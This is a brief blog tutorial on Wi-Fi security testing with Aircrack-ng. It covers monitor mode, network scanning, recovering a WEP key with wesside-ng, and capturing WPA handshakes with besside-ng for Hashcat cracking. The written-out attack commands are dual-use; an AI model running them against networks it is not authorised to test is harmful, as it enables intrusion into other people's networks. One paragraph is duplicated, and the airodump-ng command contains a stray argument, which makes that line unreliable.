Wireless Security: WPA3 and Wifi Cracking

WPA3 certification has begun. I’m not sure there’s a lot to say about the current state of wireless security beyond keeping routers up to date and using nice long passwords.

I’ll briefly revisit the ez-mode version of the testing I’ve done in the past, but it’s pretty straightforward.

Wireless Security: Hardware

I picked up an ALFA USB antenna (2.4 GHz only) a while ago to play with, and under Kali Linux you’ve got your choice of tools to look into. There are a number of graphical options, but generally if you want to learn what you’re doing you should be looking at the gold standard: Aircrack-ng.

Kali should pick the antenna up out of the box, but if you’re running Kali under a virtual machine you likely have some USB passthrough configuration to do (and is beyond the scope of this brief post).

Wireless Security: Aircrack-ng

Aircrack-ng has a wide variety of tools to play with, and here I’ll go through some of the straightforward ones.

Assuming your wifi card is detected as wlan0, putting the card into monitor mode with airmon-ng is your first step:

airmon-ng start wlan0

This gives you a new interface in monitoring mode, wlan0mon, which you’ll use to do the meat of the work here.

Your next step is to scan for your test network using airodump-ng:

airodump-ng start wlan0mon

You’ll likely get quite a list over time, assuming you’re in a populated area. There are ways to filter, like –channel and –bssid if you’d like to get more specific, but usually I just scan everything for some amount of time.

Aircrack-ng has a wide variety of tools to play with, and here I’ll go through some of the straightforward ones.

Wireless Security: Acquire handshakes and crack

If you’d like to crack a WEP network, simply run wesside-ng with the target AP MAC:

wesside-ng -v <target AP MAC> -i wlan0mon

And you should get a few files: wep.cap (the total packet capture), prga.log (contains PRGA for use with other tools), and key.log (contains the WEP key). wesside-ng is simple and straightforward, but you’re not likely to see any WEP APs in 2018.

If you’d like to crack a WPA/WPA2/(presumably) WPA3 network, run besside-ng with the target AP MAC:

besside-ng -b <target AP MAC> -i wlan0mon

This may take QUITE some time, as it’s monitoring to see a full four-way client handshake. No clients, no handshake! This’ll give you besside.log (a record of what happened) and wpa.cap, a full packet capture that the tool grabbed.

Once you’ve got the full wpa.cap, you can use Hashcat to attack the handshake itself. I’ll probably get around to a Hashcat post sooner or later.

Leave a Reply

Your email address will not be published. Required fields are marked *